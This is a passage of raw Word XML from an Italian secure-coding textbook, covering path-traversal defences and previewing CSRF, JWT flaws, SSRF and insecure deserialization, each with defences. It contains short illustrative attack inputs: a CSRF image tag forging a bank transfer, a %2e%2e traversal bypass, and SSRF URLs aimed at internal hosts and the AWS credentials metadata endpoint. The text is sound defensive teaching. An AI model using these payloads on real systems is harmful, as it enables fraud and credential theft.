              <w:t xml:space="preserve">..</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">if ".." not in nome</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bypass via doppia codifica (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%2e%2e</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) o Unicode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Difese strutturali, non filtri di stringa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">send_from_directory(cartella, nome_file)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">senza</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">basename</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">su</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nome_file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sempre</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">basename</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">prima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Permessi del processo web</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">o equivalente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lettura di tutto il sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Far girare l’app con utente dedicato a privilegi minimi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cartella dei file non separata da quella dell’app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esposizione del codice sorgente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/www/uploads/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">separata da</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/www/app/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Funzione di download che accetta nomi file dall’utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mille modi per sbagliare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Preferire ID dal database, nome file dal record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="425"/>
    <w:bookmarkStart w:id="431" w:name="Xc155001fb8a6544ed8001846808afae4eb50a3e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="sec_10_5"/>
      <w:r>
        <w:t xml:space="preserve">10.5 Anteprima del secondo anno: cinque vulnerabilità che incontrerai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D’ora in poi, una panoramica rapidissima di cinque famiglie di vulnerabilità che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non tratteremo a fondo qui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ma che incontrerai in stage o nella seconda annualità del corso. Per ognuna: cos’è in 1 paragrafo, dove sta nel framework OWASP, perché non è coperta a fondo qui.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="426" w:name="a.-csrf-cross-site-request-forgery"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A. CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cos’è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un attaccante induce un utente loggato su un sito vittima a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">eseguire azioni indesiderate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su quel sito. Esempio: Mario è loggato sulla sua banca. L’attaccante gli fa visitare una pagina che contiene un’immagine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="</w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://banca.it/bonifico?dest=ATT&amp;importo=10000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il browser di Mario fa la richiesta, includendo automaticamente i suoi cookie di sessione. La banca esegue il bonifico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese moderne:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax/Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) — la difesa più importante, attiva di default nei browser recenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nascosto nei form, verificato dal server a ogni POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Referer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verificato server-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché non a fondo qui:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">richiede di capire bene cookie cross-site, gli attacchi reali sono diventati più rari grazie a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di default nei browser moderni. Secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="426"/>
    <w:bookmarkStart w:id="427" w:name="X532c81f35543c7dbd020c1164df0ee5aeedec53"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B. JWT (JSON Web Tokens) — vulnerabilità di implementazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cos’è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I JWT sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">token strutturati firmati crittograficamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usati per autenticazione delle API REST (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">-bis). Sono uno standard utile, ma l’implementazione è piena di trabocchetti: librerie che accettano l’algoritmo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(nessuna firma), confusione fra HS256 (chiave simmetrica) e RS256 (chiave asimmetrica) che permette key confusion attack, token che non scadono mai, validazione lato server saltata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lista nera:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Token con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg: none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accettati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Chiave simmetrica HMAC banale (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">12345</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Validazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">expires_at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non verificata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Niente revoca (utente disconnesso ma token ancora valido per ore)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché non a fondo qui:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">richiede crittografia asimmetrica solida, comprensione di OAuth 2.0. Secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="427"/>
    <w:bookmarkStart w:id="428" w:name="c.-ssrf-server-side-request-forgery"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C. SSRF (Server-Side Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cos’è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’applicazione fa richieste HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">a URL che l’utente può controllare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L’attaccante usa questo per fare richieste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dal server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verso indirizzi che dall’esterno non sarebbero raggiungibili: localhost (</w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:6379</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per accedere a Redis), reti interne (</w:t>
      </w:r>
      <w:hyperlink r:id="rId66">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.0.0.5/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), endpoint di metadati cloud (</w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su AWS — restituisce credenziali AWS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale: Capital One 2019.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attaccante usa SSRF su un’app web AWS per recuperare le credenziali del ruolo IAM, scarica 100 milioni di profili clienti dal bucket S3. Multa $80 milioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché OWASP 2025 lo ha consolidato in A01:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è essenzialmente un Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lato server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— l’attaccante fa accedere il server a risorse che la sua identità non dovrebbe poter raggiungere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">allow-list degli host raggiungibili, blocco di IP privati e localhost, network segmentation. Secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="428"/>
    <w:bookmarkStart w:id="429" w:name="d.-insecure-deserialization"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D. Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cos’è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando un’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">deserializza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati che provengono da una fonte non fidata, può eseguire codice arbitrario. Esempi famigerati:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pickle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: deserializzare un pickle non fidato = remote code execution garantita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Java native serialization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’intera storia del 2015-2017 di vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deserialization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: idem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.NET BinaryFormatter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: deprecato ma ancora in uso legacy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP lo categorizza in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A08:2025 — Software or Data Integrity Failures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non deserializzare dati esterni con questi formati. Usare JSON (solo dati, non codice) o formati con schema definito (Protocol Buffers, MessagePack).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché non a fondo qui:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">richiede capire il modello a oggetti del linguaggio. Secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="429"/>
    <w:bookmarkStart w:id="430" w:name="e.-mishandling-of-exceptional-conditions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
